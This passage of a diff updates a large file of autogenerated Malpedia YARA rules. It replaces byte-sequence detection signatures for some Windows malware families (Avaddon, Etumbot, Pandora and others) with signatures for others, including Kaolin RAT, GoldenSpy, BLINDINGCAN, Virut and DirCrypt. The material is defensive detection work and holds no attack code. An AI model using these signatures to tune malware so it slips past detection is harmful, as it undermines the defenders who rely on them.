+		$sequence_6 = { 68d44f0100 59 0315???????? 21fb 031d???????? 31f1 83f2ff }
+		$sequence_7 = { 57 68e1030000 ff550c 68d1030000 }
+		$sequence_8 = { 8bc7 e9???????? 897dcc 33db 897dc8 397d08 7508 }
+		$sequence_9 = { 8d04bd04000000 50 e8???????? 8bd8 }
 
 	condition:
-		7 of them and filesize < 81360
+		7 of them and filesize < 565248
 }
-rule MALPEDIA_Win_Mm_Core_Auto : FILE
+rule MALPEDIA_Win_Laplas_Shell_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "43e09f87-25f0-5aa1-a65d-f3cf8216d568"
+		id = "9c75f717-3a83-5505-a36a-1bce6df358ef"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mm_core"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.mm_core_auto.yar#L1-L121"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.laplas_shell"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.laplas_shell_auto.yar#L1-L116"
 		license_url = "N/A"
-		logic_hash = "6a74d0b4f0725617f5a9081525f73e5b30645b5ad4c0ae527057295ae3a12104"
+		logic_hash = "651ff3d6bd8dabc0c16e2a61ceeb9a40f1d04f00168f1b0feb2a3661a16c588d"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -98556,32 +98809,32 @@ rule MALPEDIA_Win_Mm_Core_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 33ff 8db7e8ba0010 ff36 e8???????? 83c704 }
-		$sequence_1 = { ff15???????? 85c0 0f8482000000 8b442410 3bc7 747a 40 }
-		$sequence_2 = { 6800000008 51 51 51 66894c2464 8bcb }
-		$sequence_3 = { 8bf0 8975d4 85f6 0f8485000000 c745fc00000000 8a0e }
-		$sequence_4 = { 8b84246c080000 56 57 33ff 6a3c 8bf2 }
-		$sequence_5 = { 6a00 50 e8???????? 83c40c 33c0 33c9 8d542408 }
-		$sequence_6 = { 3bc1 0f87f5090000 ff248516540010 33c0 }
-		$sequence_7 = { 33c0 eb1a 8bc8 83e01f c1f905 8b0c8d40400110 c1e006 }
-		$sequence_8 = { 83e71f c1e706 8b048540400110 8d44380c }
-		$sequence_9 = { c744240c01010000 ff15???????? 8d4c2418 51 8d54240c }
+		$sequence_0 = { 0fb6825c324000 308618504000 8b4f10 8b5f14 0fb69618504000 3bcb }
+		$sequence_1 = { f7f1 0fb6825c324000 308618504000 8b4f10 8b5f14 0fb69618504000 3bcb }
+		$sequence_2 = { 8bc8 85c9 7504 ffd3 }
+		$sequence_3 = { c745fcffffffff 8b95ecfbffff 8b1d???????? 8b3d???????? }
+		$sequence_4 = { 89b594e6ffff 89b590e6ffff ff15???????? 85c0 7555 56 }
+		$sequence_5 = { 55 8bec 6aff 68???????? 64a100000000 50 b8ac190000 }
+		$sequence_6 = { 668985cafbffff 8d85c8fbffff 6a10 50 }
+		$sequence_7 = { 0f57c0 c78558e6ffff44000000 6a00 50 }
+		$sequence_8 = { ba???????? 50 8b0d???????? e8???????? }
+		$sequence_9 = { c745fc00000000 83bdecfbffff08 8d85d8fbffff 51 0f4385d8fbffff 8d8d58e6ffff }
 
 	condition:
-		7 of them and filesize < 319488
+		7 of them and filesize < 59392
 }
-rule MALPEDIA_Win_Unidentified_095_Auto : FILE
+rule MALPEDIA_Win_Kaolin_Rat_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "ae500f5e-affa-5f35-9b25-bf3d8d6f6e24"
+		id = "c9e8556c-d2a8-55c8-b1a4-294ebe1251e5"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_095"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.unidentified_095_auto.yar#L1-L126"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kaolin_rat"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.kaolin_rat_auto.yar#L1-L128"
 		license_url = "N/A"
-		logic_hash = "67701e8a3738389ac39b70a15648c44474c2440f2bd29cec3f0c8b5d1f7550a9"
+		logic_hash = "f64c57e6849676b495ac58f80cd5164da6e94327fa0e0172abebd0301649988c"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -98595,32 +98848,32 @@ rule MALPEDIA_Win_Unidentified_095_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 4c8d0590ea0000 488d1541dd0000 e8???????? 4885c0 740f 488bcb 4883c420 }
-		$sequence_1 = { 488d15f0e80100 488d0df5e80100 e8???????? eb2e 803875 }
-		$sequence_2 = { 7419 4c8d442420 ba01000000 488bcb ff15???????? 85c0 }
-		$sequence_3 = { 4d3bc1 0f84d1000000 8b7500 498b9cf7b8410200 90 4885db 740b }
-		$sequence_4 = { 498bcc 488b9424c0000000 48896c2460 48896c2458 48896c2450 48896c2448 4889442440 }
-		$sequence_5 = { 752e 48895c2430 448d4303 895c2428 488d0d67a00000 4533c9 4489442420 }
-		$sequence_6 = { 4157 4881ec68020000 488b05???????? 4833c4 4889842440020000 49896b18 }
-		$sequence_7 = { 4883c308 488d0520990100 483bd8 75d8 b001 4883c420 }
-		$sequence_8 = { ff15???????? 3d24040000 7523 eb1c 41c70601000000 4885ed 7410 }
-		$sequence_9 = { e9???????? 488d05b7890100 4a8b0ce8 42385cf938 }
+		$sequence_0 = { 44897c2428 44897c2420 4533c9 4533c0 488bd0 33c9 }
+		$sequence_1 = { 66c704083f00 eb1d 48c744242001000000 4c8d0df8af0200 ba01000000 498bcc e8???????? }
+		$sequence_2 = { 488bd7 488d4d08 e8???????? 488b4d18 488b5520 488bc2 482bc1 }
+		$sequence_3 = { 488b8a30000000 e9???????? 488b8a60000000 e9???????? 4055 4883ec20 488bea }
+		$sequence_4 = { 48833d????????10 480f4305???????? 448828 418bdd 48391d???????? }
+		$sequence_5 = { 4c8d0dab4c0200 ba03000000 488bcf e8???????? }
+		$sequence_6 = { 4885c0 750a b9c8000000 e9???????? 4c8b6008 488b00 83b88c00000000 }
+		$sequence_7 = { ba04010000 488d8db0000000 e8???????? 418bcf 48890d???????? 488d3d5eae0300 488d1517b00300 }
+		$sequence_8 = { 4883fa10 480f431d???????? 4803d9 4d8bc6 498bd5 488bcb e8???????? }
+		$sequence_9 = { 482bc1 4883f801 721d 488d4101 488945d0 488d45c0 4883fa10 }
 
 	condition:
-		7 of them and filesize < 339968
+		7 of them and filesize < 581632
 }
-rule MALPEDIA_Win_Ceeloader_Auto : FILE
+rule MALPEDIA_Win_Goldenspy_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "33871f14-7cee-5da9-9ebd-8890978a4d51"
+		id = "9a246a47-ca73-52d5-9d24-1b989582e4ce"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ceeloader"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.ceeloader_auto.yar#L1-L132"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.goldenspy"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.goldenspy_auto.yar#L1-L125"
 		license_url = "N/A"
-		logic_hash = "4d0387a20d12583a262adee6bbac65a30e624cee690a9f69b13de10eb064ad76"
+		logic_hash = "abc1cc932d348f65dac5bf1d4eeb448d62aaba8c9d68819a9d802639d61024c9"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -98634,19 +98887,19 @@ rule MALPEDIA_Win_Ceeloader_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 0bd3 3bce 8bf5 23fd 0bda 8bde 0bd3 }
-		$sequence_1 = { 48c744242000000000 e8???????? 89842438020000 488b8c2440020000 e8???????? c784249402000000000000 8944243c }
-		$sequence_2 = { 4883ec20 8bd9 4c8d0dc9f60700 b904000000 4c8d05b5f60700 488d15f6d80700 e8???????? }
-		$sequence_3 = { c7842424060000043b0000 c7842420060000660d0000 c784241c060000a2780000 c784241806000079050000 c784241406000042520000 c78424100600002b350000 c784240c06000015070000 }
-		$sequence_4 = { 89ca 2315???????? 8915???????? 0faf0d???????? 030d???????? 8b15???????? 448b05???????? }
-		$sequence_5 = { 83393f 0f837c030000 31c0 89c1 b820000000 89c2 41b800100000 }
-		$sequence_6 = { 89842444090000 8b842444090000 357a620000 89842488070000 c7842484070000d86c0000 c7842480070000e3710000 c784247c070000c1470000 }
-		$sequence_7 = { 448984242c010000 e9???????? 488b8424e8000000 488b00 8b8c24f0000000 }
-		$sequence_8 = { 89842400060000 8b8424dc0b0000 4189c1 4181e1ff010000 44898c242c0d0000 448b8c242c0d0000 41c1e106 }
-		$sequence_9 = { 898424800c0000 ff15???????? 89842488040000 8b8424780c0000 0b84247c0c0000 898424800c0000 8b8424800c0000 }
+		$sequence_0 = { 8b0cbd48b24700 c644112900 837dfc00 7507 }
+		$sequence_1 = { 8bce ff5010 eb2d 8b06 8bce ff501c eb24 }
+		$sequence_2 = { 8bc8 e8???????? 8d4de0 c645fc0c e8???????? }
+		$sequence_3 = { ff75bc 8bcf e8???????? 3bf3 0f85b4feffff b001 }
+		$sequence_4 = { 50 8bcb e8???????? ba01000000 eb0d }
+		$sequence_5 = { e8???????? 84c0 0f84d7000000 8b55c8 8d4dd8 e8???????? c745fc01000000 }
+		$sequence_6 = { 50 8bce c78588fdffff00000000 e8???????? 8b00 3b06 7507 }
+		$sequence_7 = { 51 0f434520 50 51 8d8dccfeffff e8???????? 837d1c10 }
+		$sequence_8 = { 8b08 2bd1 52 eb2b 8b8538ffffff a804 752d }
+		$sequence_9 = { 6a00 50 6802000080 ff15???????? 85c0 7557 }
 
 	condition:
-		7 of them and filesize < 2321408
+		7 of them and filesize < 1081344
 }
 rule MALPEDIA_Win_Rising_Sun_Auto : FILE
 {
@@ -98687,18 +98940,18 @@ rule MALPEDIA_Win_Rising_Sun_Auto : FILE
 	condition:
 		7 of them and filesize < 409600
 }
-rule MALPEDIA_Win_Avaddon_Auto : FILE
+rule MALPEDIA_Win_Blindingcan_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "0c31fafc-c10e-58b1-9fee-fb7be191e4b5"
+		id = "acf0a9ea-8e05-5582-9c4c-05db475e1e05"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.avaddon"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.avaddon_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.blindingcan"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.blindingcan_auto.yar#L1-L169"
 		license_url = "N/A"
-		logic_hash = "157dd793c1260894e97de0f6c4ec6c5a408218110364a6a1e7630b93b4914514"
+		logic_hash = "106ff295c55cb42cf4cd73966a6c4c30703711b6e069188fdbe10ead59c40c1a"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -98712,32 +98965,38 @@ rule MALPEDIA_Win_Avaddon_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c7459408020000 837f1410 c7459810660000 c7459c20000000 7202 8b3f 0f1007 }
-		$sequence_1 = { bf20000000 0f1f00 84db 7574 ff75fc 57 ff75f8 }
-		$sequence_2 = { 0f4345d0 51 50 8d45e8 50 ff15???????? 837de410 }
-		$sequence_3 = { 83c404 3dff000000 7607 b8ff000000 eb09 83c0ff 0f886f000000 }
-		$sequence_4 = { 8b4dcc 8b45d0 030e 83c018 8b75d4 8b55c0 46 }
-		$sequence_5 = { 0bc8 51 e8???????? 8bcf 83c404 47 8bf0 }
-		$sequence_6 = { 8b4e08 b8ffffff07 2bca 47 c1f905 8bd1 d1ea }
-		$sequence_7 = { c78524fdffff00000000 c78528fdffff0f000000 c68514fdffff00 898d2cfdffff 8a08 40 84c9 }
-		$sequence_8 = { 51 8b4df0 e8???????? 83c410 83f8ff 750e 8d4510 }
-		$sequence_9 = { e8???????? 83c408 33c0 c745ac00000000 6689459c 8b45e8 c745b007000000 }
+		$sequence_0 = { c745cc2932779f 66c745d0e35b c745d45df0da89 c745d87b772e76 c745dc62a9f6c4 c745e0d29c1f7b }
+		$sequence_1 = { a1???????? 33c5 8945fc 56 57 8d85f8f7ffff }
+		$sequence_2 = { 750a 8b30 89b495fcfeffff 42 83c00c 49 }
+		$sequence_3 = { c7857cfeffff36a54e6b c78580feffff5c01611e c78584feffffb5dcfc68 c78588feffff6ce7a33a c7858cfeffffafe2e55a c78590feffff74c31dff c78594feffff657f9183 }
+		$sequence_4 = { c78514fdffff7532479f c78518fdffffe35bc9c0 c7851cfdfffffc9c461f c78520fdffff9821ddfa c78524fdffff589a8f7a }
+		$sequence_5 = { c78554feffffa14b0c27 c78558feffff10c0aac6 c7855cfeffff489a8471 c78560feffff9cab4ad6 c78564feffff67cf2900 c78568feffff02dbaeb5 }
+		$sequence_6 = { 83c40c 85f6 741f 68???????? 68???????? 6a00 }
+		$sequence_7 = { c78504fdfffff79d6681 c78508fdffffbfa7f8a5 c7850cfdffffa0118db8 c78510fdffff4d3feb78 }
+		$sequence_8 = { 8bca e8???????? 85c0 7409 e8???????? }
+		$sequence_9 = { 99 f7fe 8bca e8???????? }
+		$sequence_10 = { b990190000 66394802 7574 488b35???????? 33d2 }
+		$sequence_11 = { 488bd3 ff15???????? 4c21642438 4c21642430 895c2428 83cbff }
+		$sequence_12 = { 4c8bc9 753b 0fb789a8040000 b8bb010000 ba00010000 }
+		$sequence_13 = { 488d4dd0 ff15???????? 488d55b8 488d4dd0 ff15???????? f20f102d???????? }
+		$sequence_14 = { 4533848410cb0100 4533451c 418bc0 c1e810 }
+		$sequence_15 = { 488bf8 483bc3 7423 448d4e81 448d4684 488d542440 }
 
 	condition:
-		7 of them and filesize < 2343936
+		7 of them and filesize < 363520
 }
-rule MALPEDIA_Win_Etumbot_Auto : FILE
+rule MALPEDIA_Win_Virut_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "c874e7f9-5803-51aa-bcc8-4faaaf0ce1ce"
+		id = "3fd5dd6e-824b-546b-b12a-268a3f416abf"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.etumbot"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.etumbot_auto.yar#L1-L358"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.virut"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.virut_auto.yar#L1-L167"
 		license_url = "N/A"
-		logic_hash = "bab72b55d5937eff166f630a71bea6d6d650e72f44dc18db352baddef63ef002"
+		logic_hash = "de37b05635cd805b87d10763e231c25410e6442bea902a0aedfdfedcccb45534"
 		score = 75
 		quality = 73
 		tags = "FILE"
@@ -98751,114 +99010,38 @@ rule MALPEDIA_Win_Etumbot_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8a00 02c2 0fb6c0 8a8405fcfeffff }
-		$sequence_1 = { 0fb6c0 8a8405fcfeffff 320437 8806 46 }
-		$sequence_2 = { c745b063726f73 c745b46f66745c c745b85c57696e c745bc646f7773 c745c05c5c4375 c745c47272656e }
-		$sequence_3 = { f7d1 23c1 42 4e 75df }
-		$sequence_4 = { 8d45f4 6820a10700 50 68???????? 68???????? }
-		$sequence_5 = { c745cc73696f6e c745d05c5c496e c745d47465726e c745d865742053 }
-		$sequence_6 = { 03c1 8bc8 81e1000000f0 7407 8bf9 }
-		$sequence_7 = { 7407 8bf9 c1ef18 33c7 f7d1 23c1 }
-		$sequence_8 = { c745d47465726e c745d865742053 c745dc65747469 c745e06e677300 }
-		$sequence_9 = { 53 56 57 8b3d???????? ffd7 8b7508 8bd8 }
-		$sequence_10 = { 57 0fbe38 33f6 33db }
-		$sequence_11 = { c745c47272656e c745c874566572 c745cc73696f6e c745d05c5c496e }
-		$sequence_12 = { ffd7 2bc3 3bc6 72ed 5f 5e }
-		$sequence_13 = { 8b45f4 0345f0 8b4d08 034dec 8a11 8810 }
-		$sequence_14 = { c645bf69 c645c062 c645c16c c645c265 c645c33b c645c420 c645c54d }
-		$sequence_15 = { 8b4d08 83c101 894d08 8b550c 83ea03 }
-		$sequence_16 = { 83c204 3b5514 7608 83c8ff }
-		$sequence_17 = { 80e10f c0e102 c0eb06 02cb }
-		$sequence_18 = { c644242c45 8854242f 884c2431 c644243273 88542434 }
-		$sequence_19 = { 83c404 8bd1 c1e902 f3ab 8bca }
-		$sequence_20 = { 6a00 68???????? 6a00 6a00 6a00 51 68???????? }
-		$sequence_21 = { e8???????? 8d45fc 50 8d85bcfeffff 50 e8???????? }
-		$sequence_22 = { 8b0c8d20cf4000 8a44c104 83e040 c3 56 8b742408 85f6 }
-		$sequence_23 = { b9ff000000 33c0 8dbda6fbffff f3ab }
-		$sequence_24 = { c645d673 c645d720 c645d84e c645d954 }
-		$sequence_25 = { 83c104 3b4d14 7608 83c8ff }
-		$sequence_26 = { 50 8d85c4eaffff 50 e8???????? 8d85ecfdffff }
-		$sequence_27 = { 59 50 8d8504ffffff e9???????? 6a18 }
-		$sequence_28 = { c645c33b c645c420 c645c54d c645c653 c645c749 c645c845 c645c920 }
-		$sequence_29 = { 8b4508 8365f800 898184110000 8d45f4 6a00 }
-		$sequence_30 = { 83c404 85c0 7429 8b442454 0fbe38 40 85ff }
-		$sequence_31 = { 89442428 f3ab 88542414 89542444 }
-		$sequence_32 = { c645d057 c645d169 c645d26e c645d364 }
-		$sequence_33 = { c645cd31 c645ce3b c645cf20 c645d057 c645d169 }
-		$sequence_34 = { 52 e8???????? 83c404 e9???????? 6a05 }
-		$sequence_35 = { c645fa74 c645fb2e c645fc64 c645fd6c }
-		$sequence_36 = { c645f569 c645f66e c645f769 c645f86e }
-		$sequence_37 = { 8b4df4 034df0 8b5508 0355ec }
-		$sequence_38 = { 50 8b4dbc 51 8b952ce6ffff 8b4210 ffd0 85c0 }
-		$sequence_39 = { c685dcefffff45 c685ddefffff20 c685deefffff35 c685dfefffff2e c685e0efffff30 }
-
-	condition:
-		7 of them and filesize < 450560
-}
-rule MALPEDIA_Win_Soul_Auto : FILE
-{
-	meta:
-		description = "autogenerated rule brought to you by yara-signator"
-		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "e9dd6236-3340-50b4-b5d0-39eff17887cc"
-		date = "2024-10-31"
-		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.soul"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.soul_auto.yar#L1-L235"
-		license_url = "N/A"
-		logic_hash = "006ca2db66b727a223c7e1c69f1643e1ec1c7be66a86b7b95f1d15a0130986f8"
-		score = 75
-		quality = 73
-		tags = "FILE"
-		version = "1"
-		tool = "yara-signator v0.6.0"
-		signator_config = "callsandjumps;datarefs;binvalue"
-		malpedia_rule_date = "20241030"
-		malpedia_hash = "26e26953c49c8efafbf72a38076855d578e0a2e4"
-		malpedia_version = "20241030"
-		malpedia_license = "CC BY-SA 4.0"
-		malpedia_sharing = "TLP:WHITE"
-
-	strings:
-		$sequence_0 = { d3e2 8515???????? 7405 e8???????? }
-		$sequence_1 = { 40 803800 75f8 c745fc00000000 90 56 ff15???????? }
-		$sequence_2 = { 57 8bf8 be???????? 743a 8da42400000000 }
-		$sequence_3 = { ff25???????? 48895c2408 4889742410 57 4883ec30 }
-		$sequence_4 = { 7cde c745fc00000000 8da42400000000 8b4df8 51 57 }
-		$sequence_5 = { 741f 8da42400000000 8b03 57 50 }
-		$sequence_6 = { 85f6 0f84a4000000 803f00 8bc7 }
-		$sequence_7 = { 85f6 7506 837dfc04 7cda }
-		$sequence_8 = { 7409 90 fe08 40 803800 }
-		$sequence_9 = { 83c404 33f6 897304 8b4304 }
-		$sequence_10 = { eb22 e8???????? 488b4c2420 ffd0 90 48837c245008 }
-		$sequence_11 = { c744243a66003600 66448974243e 488d1d4ad10100 488bc3 488d7c2448 482bfb 0fb710 }
-		$sequence_12 = { ffc7 4883c202 413bf8 72db 8bce 85f6 743c }
-		$sequence_13 = { 7507 c743089a020000 85c0 0f84be010000 83f802 0f84b5010000 83f801 }
-		$sequence_14 = { 741a 488d05f9ef0000 483bf8 740e 833f00 }
-		$sequence_15 = { 4c8bf1 b801000000 85ff 7404 8932 eb06 8bf8 }
-		$sequence_16 = { c745c047006c00 c745c662006100 c745ca6c005c00 668945ec c745ce43006100 c745d468006500 }
-		$sequence_17 = { 442bda 4183fb0f 731e 0fb606 418bcb 4883c602 }
-		$sequence_18 = { e8???????? 41894620 458bef 418bff 41c74608373f0000 eb05 }
-		$sequence_19 = { 488b4593 89442448 8bc8 e8???????? 488bf0 33c0 8945c7 }
-		$sequence_20 = { 4883eb02 4983c9ff ebae 488d45ef 4c8b4507 4983f808 490f43c4 }
-		$sequence_21 = { eb2e 4c8b542418 33ed 0f1f840000000000 420fb60411 48ffc1 }
-		$sequence_22 = { 488d1dc7850000 488d3de0850000 eb0e 488b03 4885c0 7402 }
+		$sequence_0 = { 83c40c ab ab 8d442430 50 }
+		$sequence_1 = { e9???????? 8dbec8000000 0fb74e1e 8d74311f 6804010000 57 }
+		$sequence_2 = { 3bf1 7ce5 8b442414 6a03 }
+		$sequence_3 = { 6804010000 ff15???????? 8d8424c8000000 50 }
+		$sequence_4 = { 53 6a05 8bcc 50 }
+		$sequence_5 = { 50 ff15???????? 3bc3 0f8484020000 8b400c }
+		$sequence_6 = { 03f9 57 52 6a18 }
+		$sequence_7 = { 54 51 50 52 51 51 }
+		$sequence_8 = { 85c0 7416 e314 50 8bd4 6a00 }
+		$sequence_9 = { 85c0 7d04 33c0 eb63 ff750c }
+		$sequence_10 = { 8d8424dc020000 50 33db 53 ff15???????? 8b35???????? 53 }
+		$sequence_11 = { 6a00 8bcc 6a40 6800001000 }
+		$sequence_12 = { 6a00 6800000008 6a40 51 52 6a0e 50 }
+		$sequence_13 = { 83e003 40 50 8d442428 50 8d8424e0020000 }
+		$sequence_14 = { 3b44240c 8d8c1139300000 894c2414 7cdc 53 8d442410 }
+		$sequence_15 = { 8bd4 50 54 6a40 51 52 }
 
 	condition:
-		7 of them and filesize < 1400832
+		7 of them and filesize < 98304
 }
-rule MALPEDIA_Win_Pandora_Auto : FILE
+rule MALPEDIA_Win_Unidentified_001_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "03d00108-515b-5000-bfce-e0864b2e89ce"
+		id = "f3b6be6e-c236-5d2d-a19b-afb6b895b93e"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pandora"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.pandora_auto.yar#L1-L132"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_001"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.unidentified_001_auto.yar#L1-L119"
 		license_url = "N/A"
-		logic_hash = "a88747b8869f7f515751ff70f3553c380e5110ab9369144ac753a62c000a1cae"
+		logic_hash = "499ec49f978d7f898a74204c78a47d7ff968e3be0856c4a113e03a1aece4ce50"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -98872,32 +99055,32 @@ rule MALPEDIA_Win_Pandora_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 41ffc7 83f81e 0f8f88030000 4885ff 7418 488d47ff 498d04c6 }
-		$sequence_1 = { 7424 838da400000010 448d4710 4c8b0d???????? 488d4c2430 33d2 41ffd1 }
-		$sequence_2 = { 48897c2418 4156 4883ec20 33ff 4533f6 4863df 488d0d88040300 }
-		$sequence_3 = { 415e c3 48895c2408 4889742410 57 4883ec20 4c8b5108 }
-		$sequence_4 = { 4c8d45b0 488d55c8 e8???????? 8bd8 85c0 7524 f7de }
-		$sequence_5 = { 8bcf 44335014 c1e918 0fb6d1 8bce }
-		$sequence_6 = { 498b06 4885c0 0f8432020000 8b4008 ffc8 83f806 0f8724020000 }
-		$sequence_7 = { 488b05???????? 33d2 498bcc ffd0 4c8b642460 4c8b742448 488b7c2440 }
-		$sequence_8 = { 0bc8 0fb64238 c1e108 0bc8 0fb6423e 440bd0 894c2440 }
-		$sequence_9 = { 4503d3 418bc6 23c6 41c1c60a 0bf8 4181c34efd53a9 81c7e9766d7a }
+		$sequence_0 = { 741c 83e80a 0f84c6fcffff 2def000000 }
+		$sequence_1 = { 6830750000 ffd6 8b4df8 85c9 7483 8d45fc }
+		$sequence_2 = { 85c9 0f84dafdffff e8???????? 85c0 0f85f3000000 }
+		$sequence_3 = { 8b06 8d4dfc 51 56 ff5028 85c0 7d0c }
+		$sequence_4 = { 895824 895808 c7401c06000000 47 }
+		$sequence_5 = { 2d0a020000 0f84a2faffff 2d02020000 e9???????? c705????????0d000000 }
+		$sequence_6 = { 8b4508 83e103 f3a4 8bd0 668b08 }
+		$sequence_7 = { 0f8468feffff 3d4b475a00 0f845dfeffff 3d4d4f5a00 0f8507f9ffff 8325????????00 e9???????? }
+		$sequence_8 = { 2df9070000 0f8437010000 2d01010000 0f84e2050000 2df3010000 7420 }
+		$sequence_9 = { 3d54484100 7416 3d414c4100 753b c705????????09000000 e9???????? }
 
 	condition:
-		7 of them and filesize < 1032192
+		7 of them and filesize < 65536
 }
-rule MALPEDIA_Win_Pittytiger_Rat_Auto : FILE
+rule MALPEDIA_Win_Dircrypt_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "4a10640a-725b-54f9-8b7f-afdce80ef3e7"
+		id = "c9519422-995e-5f4b-95b5-a3519aa7df7b"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pittytiger_rat"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.pittytiger_rat_auto.yar#L1-L124"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dircrypt"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.dircrypt_auto.yar#L1-L115"
 		license_url = "N/A"
-		logic_hash = "1df7687d7c472496ea30aa086a3178f66e3b2104d4ea79dc045c4e3023b998ae"
+		logic_hash = "97e8d29d80833d84634b7be7e527266210c621226e2be34c9aa4ca8405333cc4"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -98911,32 +99094,32 @@ rule MALPEDIA_Win_Pittytiger_Rat_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 50 ffd7 83c410 8d8558f9ffff 50 ff15???????? 50 }
-		$sequence_1 = { 33db f3ab ff7508 895dfc 66ab aa }
-		$sequence_2 = { e8???????? 83c428 8d85e0fdffff 50 8b46f8 ff760c c1e005 }
-		$sequence_3 = { 8d85f8fbffff ffb69c010000 68???????? 50 ffd7 }
-		$sequence_4 = { 8b1d???????? 59 59 56 ffd3 57 }
-		$sequence_5 = { 3bc3 a3???????? 0f84f2fdffff 8d45b8 c745c441786100 50 57 }
-		$sequence_6 = { 56 56 ff15???????? 3bc6 8945f4 0f84bc000000 }
-		$sequence_7 = { 51 53 56 57 33db bf80000000 53 }
-		$sequence_8 = { e8???????? 85c0 0f85e2020000 85f6 }
-		$sequence_9 = { ff750c ff7508 e8???????? 83c420 43 }
+		$sequence_0 = { 50 e8???????? 6a00 e8???????? 05d6070000 50 }
+		$sequence_1 = { e8???????? 03f0 8d45dc 50 e8???????? }
+		$sequence_2 = { e8???????? 05d3070000 50 6a01 }
+		$sequence_3 = { 833d????????00 751a 68???????? e8???????? 05d2070000 50 e8???????? }
+		$sequence_4 = { 751a 68???????? e8???????? 05d2070000 50 }
+		$sequence_5 = { 833d????????00 7514 c705????????01000000 e8???????? }
+		$sequence_6 = { c705????????01000000 e8???????? e8???????? 833d????????00 7514 }
+		$sequence_7 = { 6801000080 e8???????? e8???????? e8???????? e8???????? }
+		$sequence_8 = { 05d2070000 50 e8???????? a3???????? 6a13 68???????? }
+		$sequence_9 = { 833d????????00 7536 c705????????01000000 e8???????? }
 
 	condition:
-		7 of them and filesize < 2162688
